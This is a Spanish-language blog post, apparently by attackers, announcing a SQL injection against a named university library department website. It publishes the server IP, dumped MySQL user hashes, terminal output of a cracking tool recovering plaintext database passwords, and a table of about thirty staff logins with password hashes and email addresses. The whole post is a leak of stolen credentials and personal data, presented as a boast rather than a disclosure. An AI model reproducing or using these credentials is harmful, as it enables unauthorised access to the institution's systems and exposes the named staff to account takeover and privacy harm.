Un cliente nos pidio entrar a esta Universidad y analizandola vimos muchas vulnerabilidades y decidimos publicar esta Inyeccion Sql (la mas facil xD). estos son los datos:
Target: http://bibliotecologia.udea.edu.co/
Host IP: 200.24.17.77
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 551 ms
Current User: root@localhost
Sql Version: 5.0.22
Current DB: bibliotecologia
System User: root@localhost
DB User & Pass:
root:51a71aa84f5e79ad:localhost
root:51a71aa84f5e79ad:bibliotecologia.udea.edu.co
sihv:7ee747b1438fab32:localhost
carolina:061dd24f073615f5:localhost
tarjetas:360af43f5cd1aa99:localhost
parquee:51a71aa84f5e79ad:localhost
parquee:51a71aa84f5e79ad:127.0.0.1
ojs:0dba41335d89e2ec:localhost
agenda:2636eaa3272a5014:localhost
Data Bases:
information_schema
GUIE
agenda
bibliotecologia
bibliotecologia3
mysql
ojs
sihv
test
Crackeando los password Mysql Nos dio esto:
root@bt:~# ./poc 51a71aa84f5e79ad
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 51a71aa84f5e79ad = 'qazwsx'
root@bt:~# ./poc 7ee747b1438fab32
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 7ee747b1438fab32 = 'qwe123'
Algunos datos mas....
cal_login | cal_passwd | cal_email |
abetancur | daab467adbeee3ee6cbe5db61831a315 | abetancur@bibliotecologia.udea.edu.co |
admejia | dbc69cd0af5426aa2fad2d5d41c7e117 | admejia@bibliotecologia.udea.edu.co |
admin | c4ca4238a0b923820dcc509a6f75849b | |
bcadavid | c19e4d6eff55f8853ea9cc3f86abc301 | bcadavid@bibliotecologia.udea.edu.co |
cbetancur | 7f578f5ee6f207f4a910e5c3a980226b | cbetancur@bibliotecologia.udea.edu.co |
claudiao | 335bcaceb7b9bbaf2e0423ce694e4a29 | claudiao@bibliotecologia.udea.edu.co |
Comunicaciones | b12f42ceac8213befef98a2ebbb0a87c | comunicaciones@bibliotecologia.udea.edu.co |
daniel | aa47f8215c6f30a0dcdb2a36a9f4168e | daniel@bibliotecologia.udea.edu.co |
dial | 6de514dbc026d5badb01f8ea18ffcc9b | dial@bibliotecologia.udea.edu.co |
diana.echeverri | 0e7c386f3c7db721bc9c93eb7c2338e0 | diana.echeverri@bibliotecologia.udea.edu.co |
eibgegz | 0bc127694a6929022c1d5f5efd61141a | eibgegz@bibliotecologia.udea.edu.co |
elizabet | e8847133c4152d265693f33033736cb0 | elizabet@bibliotecologia.udea.edu.co |
fabustamante | e3b5bd948ac7798751471b11b5ae7d12 | fabustamante@bibliotecologia.udea.edu.c |
hernanmv | 53a3e323b8dfedbf150ef04ee374bfeb | hernanmv@bibliotecologia.udea.edu.co |
jaime.gomez | ba360e4b621ab96bdb3500a094dc36c3 | jaime.gomez@bibliotecologia.udea.edu.co |
jbornacelly | 9381900dfa5945f2a1c57b4b80ebcccc | jbornacelly@bibliotecologia.udea.edu.co |
jcochoa | 907a255921a69d7898a4f6fcf28ac7b5 | jcochoa@bibliotecologia.udea.edu.co |
marbel | b03541011ec99ec90ab7e7a0d5c19c1f | marbel@bibliotecologia.udea.edu.co |
mbetancur | 46171ef5d6dda95ca1c1fba8291f98c1 | mbetancur@bibliotecologia.udea.edu.co |
mgaviria | 4bfcefecf914a54ff600efb00dcef807 | mgaviria@bibliotecologia.udea.edu.co |
mlgiraldo | b8697f708af8047255f256a2759de2f0 | mlgiraldo@bibliotecologia.udea.edu.co |
mmuner | a87600dbe4279c72f1df37d9d2377d7c | mmuner@bibliotecologia.udea.edu.co |
monica | ff0d813dd5d2f64dd372c6c4b6aed086 | monica@bibliotecologia.udea.edu.co |
msmoli | 944dd8f6b75d20e742212fd82c8697b7 | msmoli@bibliotecologia.udea.edu.co |
nathalia | 584d172c5b231607bf38cf01eceb550a | nathalia@bibliotecologia.udea.edu.co |
ojara | 7e131fe50d87b36342295d86659e0244 | ojara@bibliotecologia.udea.edu.co |
secretaria.cicinf | 336073332c3559c83ac7d6949860d91e | secretaria.cicinf@bibliotecologia.udea.edu.co |
soporte | 6601df608c8f036743420420ceff62fc | soporte@bibliotecologia.udea.edu.co |
wilson.castano | 1e5f32238c3f594982e6c8faa689d125 | wilson.castano@bibliotecologia.udea.edu.co |
0 comentarios:
Publicar un comentario